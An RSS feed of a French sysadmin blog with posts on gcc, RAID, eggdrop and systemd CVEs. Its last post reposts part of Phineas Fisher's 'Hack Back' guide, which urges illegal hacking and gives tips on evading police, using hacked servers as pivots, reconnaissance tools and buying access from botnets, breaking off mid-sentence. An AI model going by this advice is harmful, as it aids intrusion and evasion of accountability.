<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>head /dev/log</title>
    <link>https://www.lamy.im/</link>
    <description>Recent content on head /dev/log</description>
    <generator>Hugo -- gohugo.io</generator>
    <language>en-us</language>
    <lastBuildDate>Sat, 04 Feb 2023 10:52:19 +0000</lastBuildDate><atom:link href="https://www.lamy.im/index.xml" rel="self" type="application/rss+xml" />
    <item>
      <title>Au revoir wordpress</title>
      <link>https://www.lamy.im/posts/au-revoir-wordpress/</link>
      <pubDate>Sat, 04 Feb 2023 10:52:19 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/au-revoir-wordpress/</guid>
      <description>Après de longues années de bons et loyaux services, j&amp;rsquo;ai trouvé wordpress trop lourd et trop chronophage à maintenir. Ce site étant plus une archive qu&amp;rsquo;autre chose désormais, devenir un site statique lui ira très bien au teint :-)</description>
      <content>&lt;p&gt;Après de longues années de bons et loyaux services, j&amp;rsquo;ai trouvé wordpress trop lourd et trop chronophage à maintenir.
Ce site étant plus une archive qu&amp;rsquo;autre chose désormais, devenir un site statique lui ira très bien au teint :-)&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>gcc compilation  failure (Value too large for defined data type)</title>
      <link>https://www.lamy.im/posts/gcc-compilation-failure-value-too-large-for-defined-data-type/</link>
      <pubDate>Sun, 10 Mar 2019 21:21:07 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/gcc-compilation-failure-value-too-large-for-defined-data-type/</guid>
      <description>I just reinstalled some of my servers with my beloved combo : gentoo &amp;amp; XFS &amp;lt;3
When I was trying to upgrade my gcc version from 7.3 to 8.2 I got the following error :
&amp;lt;pre class=&amp;#34;wp-block-code&amp;#34;&amp;gt;``` checking for uintptr_t... * /var/tmp/portage/sys-apps/sandbox-2.13/work/sandbox-2.13/libsandbox/libsandbox.c:check_syscall():968: failure (Value too large for defined data type): * ISE: fopen_wr(conftest.val) abs_path: (null) res_path: /var/tmp/portage/sys-devel/gcc-8.2.0-r6/work/build/x86_64-pc-linux-gnu/32/libatomic/conftest.val configure: error: Could not determine word size. I finally found in that very old gentoo forum post and bug report that XFS is the rootcause.</description>
      <content>&lt;p&gt;I just reinstalled some of my servers with my beloved combo : gentoo &amp;amp; XFS &amp;lt;3&lt;/p&gt;
&lt;p&gt;When I was trying to upgrade my gcc version from 7.3 to 8.2 I got the following error :&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;&amp;lt;pre class=&amp;#34;wp-block-code&amp;#34;&amp;gt;```
checking for uintptr_t...  * /var/tmp/portage/sys-apps/sandbox-2.13/work/sandbox-2.13/libsandbox/libsandbox.c:check_syscall():968: failure (Value too large for defined data type):
 * ISE: fopen_wr(conftest.val)
        abs_path: (null)
        res_path: /var/tmp/portage/sys-devel/gcc-8.2.0-r6/work/build/x86_64-pc-linux-gnu/32/libatomic/conftest.val
configure: error: Could not determine word size.
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;I finally found in that very old &lt;a href=&#34;https://forums.gentoo.org/viewtopic-p-7440348.html&#34;&gt;gentoo forum post&lt;/a&gt; and &lt;a href=&#34;https://bugs.gentoo.org/471024&#34;&gt;bug report&lt;/a&gt; that XFS is the rootcause. So I decided to move my ‘/var/tmp/portage’ from XFS to tmpfs by adding the following to /etc/fstab. Size may be adapted but 2G is not enough to compile GCC successfully.&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;&amp;lt;pre class=&amp;#34;wp-block-preformatted&amp;#34;&amp;gt;tmpfs /var/tmp/portage tmpfs size=4G,uid=portage,gid=portage,mode=775,noatime        0 0
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Then I resumed the compilation, it worked like a charm and I was able to set my new GCC version as default one.&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ emerge --resume
$ gcc-config -l
[1] x86_64-pc-linux-gnu-7.3.0 *
[2] x86_64-pc-linux-gnu-8.2.0 
$ gcc-config 2
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Again, gentoo documentation and resources was awesome 🙂&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>systemd-journald exploit &amp; root access</title>
      <link>https://www.lamy.im/posts/systemd-journald-exploit-root-access/</link>
      <pubDate>Thu, 10 Jan 2019 21:47:24 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/systemd-journald-exploit-root-access/</guid>
      <description>Des chercheurs de Qualys ont découvert 3 failles de sécurité dans journald qui permet une escalade de privilège. Des PoC ont été fait et cela prend 10minutes sur i386 et 70minutes sur amd64. Attention donc, car tous les patchs ne sont pas encore dispo.
Ci dessous le résumé provenant de chez qualys:
========= Summary =========
We discovered three vulnerabilities in systemd-journald (https://en.wikipedia.org/wiki/Systemd):
– CVE-2018-16864 and CVE-2018-16865, two memory corruptions (attacker-controlled alloca()s);</description>
      <content>&lt;p&gt;Des chercheurs de Qualys ont découvert 3 failles de sécurité dans journald qui permet une escalade de privilège. Des PoC ont été fait et cela prend 10minutes sur i386 et 70minutes sur amd64. Attention donc, car tous les patchs ne sont pas encore dispo.&lt;/p&gt;
&lt;p&gt;Ci dessous le résumé provenant de chez qualys:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;========= Summary =========&lt;/p&gt;
&lt;p&gt;We discovered three vulnerabilities in systemd-journald (&lt;a href=&#34;https://en.wikipedia.org/wiki/Systemd)&#34;&gt;https://en.wikipedia.org/wiki/Systemd)&lt;/a&gt;:&lt;/p&gt;
&lt;p&gt;– CVE-2018-16864 and CVE-2018-16865, two memory corruptions (attacker-controlled alloca()s);&lt;/p&gt;
&lt;p&gt;– CVE-2018-16866, an information leak (an out-of-bounds read).&lt;/p&gt;
&lt;p&gt;CVE-2018-16864 was introduced in April 2013 (systemd v203) and became exploitable in February 2016 (systemd v230). We developed a proof of concept for CVE-2018-16864 that gains eip control on i386.&lt;/p&gt;
&lt;p&gt;CVE-2018-16865 was introduced in December 2011 (systemd v38) and became exploitable in April 2013 (systemd v201).&lt;/p&gt;
&lt;p&gt;CVE-2018-16866 was introduced in June 2015 (systemd v221) and was inadvertently fixed in August 2018.&lt;/p&gt;
&lt;p&gt;We developed an exploit for CVE-2018-16865 and CVE-2018-16866 that obtains a local root shell in 10 minutes on i386 and 70 minutes on amd64, on average. We will publish our exploit in the near future.&lt;/p&gt;
&lt;p&gt;To the best of our knowledge, all systemd-based Linux distributions are vulnerable, but SUSE Linux Enterprise 15, openSUSE Leap 15.0, and Fedora 28 and 29 are not exploitable because their user space is compiled with GCC’s -fstack-clash-protection.&lt;/p&gt;
&lt;p&gt;This confirms &lt;a href=&#34;https://grsecurity.net/an&#34;&gt;https://grsecurity.net/an&lt;/a&gt;_ancient_kernel_hole_is_not_closed.php: « It should be clear that kernel-only attempts to solve [the Stack Clash] will necessarily always be incomplete, as the real issue lies in the lack of stack probing. »&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;L’intégration de systemd dans les distributions linux il y a plusieurs années avait fait pas mal débat.&lt;/p&gt;
&lt;p&gt;Le fait qu’il soit en rupture avec le principe initial d’unix sur le découpages des tâches avait provoqué pas mal d’émotions.&lt;/p&gt;
&lt;p&gt;Je ne parle pas du fait qu’on est passé d’un system d’init avec des scripts shell à des fichiers ini, des logs binaires et pas mal d’intégration de fonctions qui dépassent l’init comme : les logs system, les cgroup, Resource accounting User session management, mise en veille, synchro du temps, résolution DNS, la découverte des disques etc.&lt;/p&gt;
&lt;p&gt;L’effet de bord et qu’udev a du évoluer et systemd en est devenu un prérequis… la boucle était bouclée.&lt;/p&gt;
&lt;p&gt;Poussé par RedHat, systemd a été intégré dans la majeure partie des distrbution. Gentoo et slackware font partie des rares courageuses exeptions et ne sont donc pas concernées par ces bugs 😉&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://www.qualys.com/2019/01/09/system-down/system-down.txt&#34;&gt;https://www.qualys.com/2019/01/09/system-down/system-down.txt&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://security-tracker.debian.org/tracker/CVE-2018-16864&#34;&gt;https://security-tracker.debian.org/tracker/CVE-2018-16864&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://security-tracker.debian.org/tracker/CVE-2018-16865&#34;&gt;https://security-tracker.debian.org/tracker/CVE-2018-16865&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://security-tracker.debian.org/tracker/CVE-2018-16866&#34;&gt;https://security-tracker.debian.org/tracker/CVE-2018-16866&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content>
    </item>
    
    <item>
      <title>Ajout d&#39;un disque dans un raid 5 dmraid</title>
      <link>https://www.lamy.im/posts/ajout-dun-disque-dans-un-raid-5-dmraid/</link>
      <pubDate>Wed, 27 Dec 2017 22:27:00 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/ajout-dun-disque-dans-un-raid-5-dmraid/</guid>
      <description>(Voici un vieux billet qui trainait dans les brouillons, j’en profite pour le publier maintenant si ça peut servir à certains)
Restons dans le principe KISS (au moins pour l’utilisateur) avec dmraid qui permet la manipulation des disques très facilement dans une grappe RAID sous linux.
Dernièrement l’ajout d’un disque dans un de mes RAID5 n’a pas été plus compliqué que ça:
Copie de la table de partition d’un disque présent dans la grappe vers le nouveau.</description>
      <content>&lt;p&gt;&lt;em&gt;(Voici un vieux billet qui trainait dans les brouillons, j’en profite pour le publier maintenant si ça peut servir à certains)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Restons dans le principe KISS (au moins pour l’utilisateur) avec dmraid qui permet la manipulation des disques très facilement dans une grappe RAID sous linux.&lt;/p&gt;
&lt;p&gt;Dernièrement l’ajout d’un disque dans un de mes RAID5 n’a pas été plus compliqué que ça:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Copie de la table de partition d’un disque présent dans la grappe vers le nouveau.&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;sfdisk -d /dev/sdb | sfdisk /dev/sdf
&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
&lt;li&gt;Ajout du disque dans la grappe (en tant que spare)&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;mdadm --manage /dev/md0 --add /dev/sdf1
&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
&lt;li&gt;Ajout du disque comme disque de donnée dans le RAID5. Attention c’est à ce moment que les données bougent. Il ne faut pas interrompre cette opération qui dure plusieurs heures. On assume ici que la grappe passe de 4 à 5 disques actifs.&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;mdadm --grow --raid-devices=5 --backup-file=/root/md0-grow.bak /dev/md0
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Preuve que c’est long:&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;Personalities : [raid6] [raid5] [raid4] [linear] [multipath] [raid0] [raid1] [raid10] 
md0 : active raid5 sdf1[6] sdd1[3] sdc1[4] sdb1[1] sde1[5]
 5860150272 blocks super 1.2 level 5, 512k chunk, algorithm 2 [5/5] [UUUUU]
 [&amp;gt;....................] reshape = 0.8% (17033544/1953383424) finish=1183.5min speed=27266K/sec
 
unused devices: &amp;lt;none&amp;gt;
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;En bref, on se redonne RDV dans plus de 16h.&lt;br&gt;
Ensuite il suffit de redimensionner le FS ou le LV + le FS selon comment vous avez découpé le volume.&lt;/p&gt;
&lt;p&gt;Des sources bien mieux documentées éxistent, et heureusement :&lt;br&gt;
&lt;a href=&#34;https://raid.wiki.kernel.org/index.php/RAID_setup&#34;&gt;https://raid.wiki.kernel.org/index.php/RAID_setup&lt;/a&gt;&lt;br&gt;
&lt;a href=&#34;https://wiki.archlinux.org/index.php/Installing_with_Fake_RAID&#34;&gt;https://wiki.archlinux.org/index.php/Installing_with_Fake_RAID&lt;/a&gt;&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>eggdrop sur ubuntu xenial 16.04 LTS</title>
      <link>https://www.lamy.im/posts/eggdrop-sur-ubuntu-xenial-16-04-lts/</link>
      <pubDate>Tue, 15 Nov 2016 20:48:39 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/eggdrop-sur-ubuntu-xenial-16-04-lts/</guid>
      <description>Pour compiler eggdrop 1.6.21 (oui ça existe encore) sur ubuntu 16.04 LTS, il faut bien évidemment installer TCL et ses header pour la compilation. Dans mon cas j’ai installé les paquets tcl8.6 et tcl8.6-dev
Mais en plus de préciser leur chemin, il faut passer un CFLAG particulier à GCC pour passer l’étape du link sans encombre.
CFLAGS=&amp;#34;-std=gnu89&amp;#34; ./configure --with-tcllib=&amp;#39;/usr/lib/x86_64-linux-gnu/libtcl8.6.so&amp;#39; --with-tclinc=&amp;#39;/usr/include/tcl8.6/tcl.h&amp;#39; make config make make install source sur le eggwiki
Pour référence l’erreur est ci dessous :</description>
      <content>&lt;p&gt;Pour compiler eggdrop 1.6.21 (oui ça existe encore) sur ubuntu 16.04 LTS, il faut bien évidemment installer TCL et ses header pour la compilation. Dans mon cas j’ai installé les paquets tcl8.6 et tcl8.6-dev&lt;br&gt;
Mais en plus de préciser leur chemin, il faut passer un CFLAG particulier à GCC pour passer l’étape du link sans encombre.&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;CFLAGS=&amp;#34;-std=gnu89&amp;#34; ./configure --with-tcllib=&amp;#39;/usr/lib/x86_64-linux-gnu/libtcl8.6.so&amp;#39; --with-tclinc=&amp;#39;/usr/include/tcl8.6/tcl.h&amp;#39;
make config
make
make install
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;source sur le &lt;a href=&#34;http://eggwiki.org/Inline&#34;&gt;eggwiki&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Pour référence l’erreur est ci dessous :&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;gcc -g -O2 -pipe -Wall -I../.. -I../.. -I../../src -DHAVE_CONFIG_H -c strftime.c
In file included from ../../src/main.h:112:0,
from strftime.c:26:
../../src/tclhash.h:78:13: warning: inline function ‘garbage_collect_tclhash’ declared but never defined
inline void garbage_collect_tclhash(void);
In file included from ../../src/main.h:107:0,
from strftime.c:26:
../../src/proto.h:274:12: warning: inline function ‘open_listen’ declared but never defined
inline int open_listen(int *);
make[2]: Leaving directory &amp;#39;/home/kasimir/eggdrop1.6.21/src/compat&amp;#39;

---------- Yeah! That&amp;#39;s the compiling, now the linking! ----------

Linking eggdrop (standard build).

gcc -o ../eggdrop bg.o botcmd.o botmsg.o botnet.o chanprog.o cmds.o dcc.o dccutil.o dns.o flags.o language.o match.o main.o mem.o misc.o misc\_file.o modules.o net.o rfc1459.o tcl.o tcldcc.o tclhash.o tclmisc.o tcluser.o userent.o userrec.o users.o -L/usr/lib/x86\_64-linux-gnu -ltcl8.6 -lm -ldl -lnsl -lpthread md5/md5c.o compat/\*.o `cat mod/mod.xlibs`  
main.o: In function `garbage_collect&amp;#39;:  
/home/kasimir/eggdrop1.6.21/src/./main.c:710: undefined reference to `garbage_collect_tclhash&amp;#39;  
modules.o:(.data+0x2a0): undefined reference to `open_listen&amp;#39;  
tcldcc.o: In function `tcl_listen&amp;#39;:  
/home/kasimir/eggdrop1.6.21/src/tcldcc.c:942: undefined reference to `open_listen&amp;#39;  
collect2: error: ld returned 1 exit status  
Makefile:37: recipe for target &amp;#39;../eggdrop&amp;#39; failed  
make\[1\]: \*\*\* \[../eggdrop\] Error 1  
make\[1\]: Leaving directory &amp;#39;/home/kasimir/eggdrop1.6.21/src&amp;#39;  
Makefile:202: recipe for target &amp;#39;modegg&amp;#39; failed  
make: \*\*\* \[modegg\] Error 2
&lt;/code&gt;&lt;/pre&gt;</content>
    </item>
    
    <item>
      <title>le hacker de hackingteam &amp;#8230;</title>
      <link>https://www.lamy.im/posts/le-hacker-de-hackingteam/</link>
      <pubDate>Fri, 29 Apr 2016 00:03:40 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/le-hacker-de-hackingteam/</guid>
      <description>… serait PhineasFisher et il à fait un post relativement détaillé sur le mode opératoire utilisé pour pénétrer le réseau de hackingteam.
Pour rappel hackingteam est une société italienne connue pour avoir fourni des logiciels de hack et de surveillance offensifs à des états avec pour cible des activistes, des journalistes etc (entre autre activités).
Environ 400Go de données de la hackingteam ont été leak l’été dernier suite à une attaque sur leur infrastructure.</description>
      <content>&lt;p&gt;… serait PhineasFisher et il à fait un post relativement détaillé sur le mode opératoire utilisé pour pénétrer le réseau de hackingteam.&lt;/p&gt;
&lt;p&gt;Pour rappel hackingteam est une société italienne connue pour avoir fourni des logiciels de hack et de surveillance offensifs à des états avec pour cible des activistes, des journalistes etc (entre autre activités).&lt;/p&gt;
&lt;p&gt;Environ 400Go de données de la hackingteam ont été leak l’été dernier suite à une attaque sur leur infrastructure.&lt;/p&gt;
&lt;p&gt;Il révèle ses motivations mais également les différentes méthodes utilisées pour pénétrer les systèmes et extraire les données.&lt;/p&gt;
&lt;p&gt;Une lecture très interessante où il dit avoir utilisé des outils bien connus de port scanning ou de récupération de mots de passe windows mais aussi avoir monté la target iSCSI de leur NAS synology depuis une machine externe via du port forwarding sur lequel était hebergé la sauvegarde de leur exchange.&lt;/p&gt;
&lt;p&gt;Lien original en espagnol :&lt;a href=&#34;http://pastebin.com/raw/GPSHF04A&#34;&gt;http://pastebin.com/raw/GPSHF04A&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Dans la suite du billet, la traduction de son post également disponible sur &lt;a href=&#34;http://pastebin.com/raw/0SNSvyjJ&#34;&gt;http://pastebin.com/raw/0SNSvyjJ&lt;/a&gt;&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;                _   _            _      ____             _    _ 
               | | | | __ _  ___| | __ | __ )  __ _  ___| | _| |
               | |_| |/ _` |/ __| |/ / |  _ \ / _` |/ __| |/ / |
               |  _  | (_| | (__|   &amp;lt;  | |_) | (_| | (__|   &amp;lt;|_|
               |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
                                                 
                                  A DIY Guide



                                 ,-._,-._             
                              _,-\  o O_/;            
                             / ,  `     `|            
                             | \-.,___,  /   `        
                              \ `-.__/  /    ,.\      
                             / `-.__.-\`   ./   \&amp;#39;
                            / /|    ___\ ,/      `\
                           ( ( |.-&amp;#34;`   &amp;#39;/\         \  `
                            \ \/      ,,  |          \ _
                             \|     o/o   /           \.
                              \        , /             /
                              ( __`;-;&amp;#39;__`)            \\
                              `//&amp;#39;`   `||`              `\
                             _//       ||           __   _   _ _____   __
                     .-&amp;#34;-._,(__)     .(__).-&amp;#34;&amp;#34;-.      | | | | |_   _| |
                    /          \    /           \     | | |_| | | |   |
                    \          /    \           /     | |  _  | | |   |
                     `&amp;#39;-------`      `--------&amp;#39;`    __| |_| |_| |_|   |__
                               #antisec



--[ 1 - Introduction ]----------------------------------------------------------

You&amp;#39;ll notice the change in language since the last edition [1]. The
English-speaking world already has tons of books, talks, guides, and
info about hacking. In that world, there&amp;#39;s plenty of hackers better than me,
but they misuse their talents working for &amp;#34;defense&amp;#34; contractors, for intelligence
agencies, to protect banks and corporations, and to defend the status quo.
Hacker culture was born in the US as a counterculture, but that origin only
remains in its aesthetics - the rest has been assimilated. At least they can
wear a t-shirt, dye their hair blue, use their hacker names, and feel like
rebels while they work for the Man.

You used to have to sneak into offices to leak documents [2]. You used to need
a gun to rob a bank. Now you can do both from bed with a laptop in hand [3][4].
Like the CNT said after the Gamma Group hack: &amp;#34;Let&amp;#39;s take a step forward with
new forms of struggle&amp;#34; [5]. Hacking is a powerful tool, let&amp;#39;s learn and fight!

[1] http://pastebin.com/raw.php?i=cRYvK4jb
[2] https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI
[3] http://www.aljazeera.com/news/2015/09/algerian-hacker-hero-hoodlum-150921083914167.html
[4] https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf 
[5] http://madrid.cnt.es/noticia/consideraciones-sobre-el-ataque-informatico-a-gamma-group


--[ 2 - Hacking Team ]----------------------------------------------------------

Hacking Team was a company that helped governments hack and spy on
journalists, activists, political opposition, and other threats to their power
[1][2][3][4][5][6][7][8][9][10][11]. And, occasionally, on actual criminals
and terrorists [12]. Vincenzetti, the CEO, liked to end his emails with the
fascist slogan &amp;#34;boia chi molla&amp;#34;. It&amp;#39;d be more correct to say &amp;#34;boia chi vende
RCS&amp;#34;. They also claimed to have technology to solve the &amp;#34;problem&amp;#34; posed by Tor
and the darknet [13]. But seeing as I&amp;#39;m still free, I have my doubts about
its effectiveness.

[1] http://www.animalpolitico.com/2015/07/el-gobierno-de-puebla-uso-el-software-de-hacking-team-para-espionaje-politico/
[2] http://www.prensa.com/politica/claves-entender-Hacking-Team-Panama_0_4251324994.html
[3] http://www.24-horas.mx/ecuador-espio-con-hacking-team-a-opositor-carlos-figueroa/
[4] https://citizenlab.org/2012/10/backdoors-are-forever-hacking-team-and-the-targeting-of-dissent/
[5] https://citizenlab.org/2014/02/hacking-team-targeting-ethiopian-journalists/
[6] https://citizenlab.org/2015/03/hacking-team-reloaded-us-based-ethiopian-journalists-targeted-spyware/
[7] http://focusecuador.net/2015/07/08/hacking-team-rodas-paez-tiban-torres-son-espiados-en-ecuador/
[8] http://www.pri.org/stories/2015-07-08/these-ethiopian-journalists-exile-hacking-team-revelations-are-personal
[9] https://theintercept.com/2015/07/07/leaked-documents-confirm-hacking-team-sells-spyware-repressive-countries/
[10] http://www.wired.com/2013/06/spy-tool-sold-to-governments/
[11] http://www.theregister.co.uk/2015/07/13/hacking_team_vietnam_apt/
[12] http://www.ilmessaggero.it/primopiano/cronaca/yara_bossetti_hacking_team-1588888.html
[13] http://motherboard.vice.com/en_ca/read/hacking-team-founder-hey-fbi-we-can-help-you-crack-the-dark-web


--[ 3 - Stay safe out there ]---------------------------------------------------

Unfortunately, our world is backwards. You get rich by doing bad things and go
to jail for doing good. Fortunately, thanks to the hard work of people like
the Tor project [1], you can avoid going to jail by taking a few simple
precautions:

1) Encrypt your hard disk [2]

   I guess when the police arrive to seize your computer, it means you&amp;#39;ve
   already made a lot of mistakes, but it&amp;#39;s better to be safe.

2) Use a virtual machine with all traffic routed through Tor

   This accomplishes two things. First, all your traffic is anonymized through
   Tor. Second, keeping your personal life and your hacking on separate
   computers helps you not to mix them by accident.

   You can use projects like Whonix [3], Tails [4], Qubes TorVM [5], or
   something custom [6]. Here&amp;#39;s [7] a detailed comparison.

3) (Optional) Don&amp;#39;t connect directly to Tor
   
   Tor isn&amp;#39;t a panacea. They can correlate the times you&amp;#39;re connected to Tor
   with the times your hacker handle is active. Also, there have been
   successful attacks against Tor [8]. You can connect to Tor using other
   peoples&amp;#39; wifi. Wifislax [9] is a linux distro with a lot of tools for
   cracking wifi. Another option is to connect to a VPN or a bridge node [10]
   before Tor, but that&amp;#39;s less secure because they can still correlate the
   hacker&amp;#39;s activity with your house&amp;#39;s internet activity (this was used as
   evidence against Jeremy Hammond [11]).

   The reality is that while Tor isn&amp;#39;t perfect, it works quite well. When I
   was young and reckless, I did plenty of stuff without any protection (I&amp;#39;m
   referring to hacking) apart from Tor, that the police tried their hardest
   to investigate, and I&amp;#39;ve never had any problems.

[1] https://www.torproject.org/
[2] https://info.securityinabox.org/es/chapter-4
[3] https://www.whonix.org/
[4] https://tails.boum.org/
[5] https://www.qubes-os.org/doc/privacy/torvm/
[6] https://trac.torproject.org/projects/tor/wiki/doc/TransparentProxy
[7] https://www.whonix.org/wiki/Comparison_with_Others
[8] https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack/
[9] http://www.wifislax.com/
[10] https://www.torproject.org/docs/bridges.html.en
[11] http://www.documentcloud.org/documents/1342115-timeline-correlation-jeremy-hammond-and-anarchaos.html


----[ 3.1 - Infrastructure ]----------------------------------------------------

I don&amp;#39;t hack directly from Tor exit nodes. They&amp;#39;re on blacklists, they&amp;#39;re
slow, and they can&amp;#39;t receive connect-backs. Tor protects my anonymity while I
connect to the infrastructure I use to hack, which consists of:

1) Domain Names

   For C&amp;amp;C addresses, and for DNS tunnels for guaranteed egress.

2) Stable Servers

   For use as C&amp;amp;C servers, to receive connect-back shells, to launch attacks,
   and to store the loot.

3) Hacked Servers

   For use as pivots to hide the IP addresses of the stable servers. And for
   when I want a fast connection without pivoting, for example to scan ports,
   scan the whole internet, download a database with sqli, etc.

Obviously, you have to use an anonymous payment method, like bitcoin (if it&amp;#39;s
used carefully).


----[ 3.2 - Attribution ]-------------------------------------------------------

In the news we often see attacks traced back to government-backed hacking
groups (&amp;#34;APTs&amp;#34;), because they repeatedly use the same tools, leave the same
footprints, and even use the same infrastructure (domains, emails, etc).
They&amp;#39;re negligent because they can hack without legal consequences.

I didn&amp;#39;t want to make the police&amp;#39;s work any easier by relating my hack of
Hacking Team with other hacks I&amp;#39;ve done or with names I use in my day-to-day
work as a blackhat hacker. So, I used new servers and domain names, registered
with new emails, and payed for with new bitcoin addresses. Also, I only used
tools that are publicly available, or things that I wrote specifically for
this attack, and I changed my way of doing some things to not leave my usual
forensic footprint.


--[ 4 - Information Gathering ]-------------------------------------------------

Although it can be tedious, this stage is very important, since the larger the
attack surface, the easier it is to find a hole somewhere in it.


----[ 4.1 - Technical Information ]---------------------------------------------

Some tools and techniques are:

1) Google

   A lot of interesting things can be found with a few well-chosen search
   queries. For example, the identity of DPR [1]. The bible of Google hacking
   is the book &amp;#34;Google Hacking for Penetration Testers&amp;#34;. You can find a short
   summary in Spanish at [2].

2) Subdomain Enumeration

   Often, a company&amp;#39;s main website is hosted by a third party, and you&amp;#39;ll find
   the company&amp;#39;s actual IP range thanks to subdomains like mx.company.com or
   ns1.company.com. Also, sometimes there are things that shouldn&amp;#39;t be exposed
   in &amp;#34;hidden&amp;#34; subdomains. Useful tools for discovering domains and subdomains
   are fierce [3], theHarvester [4], and recon-ng [5].

3) Whois lookups and reverse lookups

   With a reverse lookup using the whois information from a domain or IP range
   of a company, you can find other domains and IP ranges. As far as I know,
   there&amp;#39;s no free way to do reverse lookups aside from a google &amp;#34;hack&amp;#34;:
   
   &amp;#34;via della moscova 13&amp;#34; site:www.findip-address.com
   &amp;#34;via della moscova 13&amp;#34; site:domaintools.com

4) Port scanning and fingerprinting

   Unlike the other techniques, this talks to the company&amp;#39;s servers. I
   include it in this section because it&amp;#39;s not an attack, it&amp;#39;s just
   information gathering. The company&amp;#39;s IDS might generate an alert, but you
   don&amp;#39;t have to worry since the whole internet is being scanned constantly.

   For scanning, nmap [6] is precise, and can fingerprint the majority of
   services discovered. For companies with very large IP ranges, zmap [7] or
   masscan [8] are fast. WhatWeb [9] or BlindElephant [10] can fingerprint web
   sites.

[1] http://www.nytimes.com/2015/12/27/business/dealbook/the-unsung-tax-agent-who-put-a-face-on-the-silk-road.html
[2] http://web.archive.org/web/20140610083726/http://www.soulblack.com.ar/repo/papers/hackeando_con_google.pdf
[3] http://ha.ckers.org/fierce/
[4] https://github.com/laramies/theHarvester
[5] https://bitbucket.org/LaNMaSteR53/recon-ng
[6] https://nmap.org/
[7] https://zmap.io/
[8] https://github.com/robertdavidgraham/masscan
[9] http://www.morningstarsecurity.com/research/whatweb
[10] http://blindelephant.sourceforge.net/


----[ 4.2 - Social Information ]------------------------------------------------

For social engineering, it&amp;#39;s useful to have information about the employees,
their roles, contact information, operating system, browser, plugins,
software, etc. Some resources are:

1) Google

   Here as well, it&amp;#39;s the most useful tool.

2) theHarvester and recon-ng

   I already mentioned them in the previous section, but they have a lot more
   functionality. They can find a lot of information quickly and
   automatically. It&amp;#39;s worth reading all their documentation.

3) LinkedIn

   A lot of information about the employees can be found here. The company&amp;#39;s
   recruiters are the most likely to accept your connection requests.

4) Data.com

   Previously known as jigsaw. They have contact information for many
   employees.

5) File Metadata

   A lot of information about employees and their systems can be found in
   metadata of files the company has published. Useful tools for finding
   files on the company&amp;#39;s website and extracting the metadata are metagoofil
   [1] and FOCA [2].

[1] https://github.com/laramies/metagoofil
[2] https://www.elevenpaths.com/es/labstools/foca-2/index.html


--[ 5 - Entering the network ]--------------------------------------------------

There are various ways to get a foothold. Since the method I used against
Hacking Team is uncommon and a lot more work than is usually necessary, I&amp;#39;ll
talk a little about the two most common ways, which I recommend trying first.


----[ 5.1 - Social Engineering ]------------------------------------------------

Social engineering, specifically spear phishing, is responsible for the
majority of hacks these days. For an introduction in Spanish, see [1]. For
more information in English, see [2] (the third part, &amp;#34;Targeted Attacks&amp;#34;). For
fun stories about the social engineering exploits of past generations, see
[3]. I didn&amp;#39;t want to try to spear phish Hacking Team, as their whole business
is helping governments spear phish their opponents, so they&amp;#39;d be much more
likely to recognize and investigate a spear phishing attempt.

[1] http://www.hacknbytes.com/2016/01/apt-pentest-con-empire.html
[2] http://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes/
[3] http://www.netcomunity.com/lestertheteacher/doc/ingsocial1.pdf


----[ 5.2 - Buying Access ]-----------------------------------------------------

Thanks to hardworking Russians and their exploit kits, traffic sellers, and
bot herders, many companies already have compromised computers in their
networks. Almost all of the Fortune 500, with their huge networks, have some
bots already inside. However, Hacking Team is a very small company, and most
of it&amp;#39;s employees are infosec experts, so there was a low chance that they&amp;#39;d
already been compromised.


----[ 5.3 - Technical Exploitation ]--------------------------------------------

After the Gamma Group hack, I described a process for searching for
